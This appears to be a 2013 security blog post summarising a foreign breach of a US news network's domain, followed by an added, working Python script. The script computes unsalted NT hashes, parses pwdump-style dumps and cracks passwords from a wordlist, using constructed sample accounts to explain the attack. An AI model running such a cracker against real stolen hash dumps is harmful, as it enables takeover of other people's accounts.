Irregular Expressions

Jan 30 2013   11:41PM GMT

Information Regarding A Significant Foreign Breach In To A US News Network

Dan O'Connor

This is a good illustration of how, once someone gets into your network with a specific target in mind, it can be infuriatingly difficult to remove them.

With the amount of access that was gained, significant damage could have been done to the network's internal infrastructure. Instead, the attackers had specific targets in mind. The information in the article is very good, but I can give the executive version.

1) Access was gained to the network through a suspected phishing attack.
2) A foothold was gained on at least three computers.
3) Password hashes were stolen from the domain controller. (The way this is worded, it sounds like they stole every single hash, and that is very possible: whoever can read the domain controller's account database can take all of them at once.)
4) A rainbow table was most likely used to crack the hashes and gain access to those accounts.
5) Routines were set up to search for documents and mail associated with specific users.
6) 45 pieces of custom malware were installed during the attackers' time on the network. Of these, only a single sample was detected by the network's AV vendor, Symantec. I don't think you should take this as a total negative against Symantec. The attackers would have known which AV was being used and would have crafted their tools to avoid detection by it.
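As an added example (not code from the original post or from the article it summarises), the block below shows why steps 3 and 4 work so well against a Windows domain: an NT hash is MD4 over the UTF-16LE encoding of the password with no per-user salt, so one precomputed table of candidate passwords covers every account in the dump, and two users with the same password show up with identical hashes. The pwdump-style lines, the account names and the wordlist are constructed sample input, and a flat dictionary stands in for a real rainbow table (which trades memory for recomputation through hash chains); the property being exploited, the absence of a salt, is the same. MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
"""Why stolen domain-controller hashes fall to precomputed tables.

Added example, not from the original post. NT hash = MD4(UTF-16LE(password))
with no salt, so one table serves every account. All sample data below is
constructed for illustration.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Only here because OpenSSL 3 often disables md4."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)                     # single 1 bit, then zero padding
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)    # 64-bit little-endian message length
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (function, additive constant, word order, per-step shifts) for the three rounds
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: ABCD -> DABC -> CDAB -> BCDA
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK,
                          (c0 + c) & MASK, (d0 + d) & MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE password, no salt, no iteration."""
    return md4(password.encode("utf-16le")).hex()


def build_table(wordlist) -> dict:
    """One precomputation per candidate; reusable against every user because there is no salt."""
    return {nt_hash(w): w for w in wordlist}


def parse_pwdump(text: str):
    """Yield (user, nthash) from pwdump-style lines: user:rid:lmhash:nthash:::"""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        yield parts[0], parts[3].lower()


def crack(dump_text: str, wordlist) -> dict:
    """Map each user in the dump to the recovered password, or None if not in the table."""
    table = build_table(wordlist)
    return {user: table.get(h) for user, h in parse_pwdump(dump_text)}


# Constructed sample data (hypothetical accounts, not a real dump). The LM field
# is the well-known "no LM hash" value; carol's password is deliberately absent
# from the wordlist so she shows up as uncracked.
WORDLIST = ["123456", "password", "letmein", "Welcome1"]
SAMPLE_DUMP = (
    "# constructed sample, not a real dump\n"
    f"alice:1001:aad3b435b51404eeaad3b435b51404ee:{nt_hash('password')}:::\n"
    f"bob:1002:aad3b435b51404eeaad3b435b51404ee:{nt_hash('password')}:::\n"
    f"carol:1003:aad3b435b51404eeaad3b435b51404ee:{nt_hash('Tr0ub4dor&3-not-in-list')}:::\n"
)

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user}: {pw if pw else '<not in table>'}")
```

Note that alice and bob carry byte-for-byte identical hashes: with no salt, cracking one account's hash cracks every account that shares the password, and the same table works against the next domain you dump.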
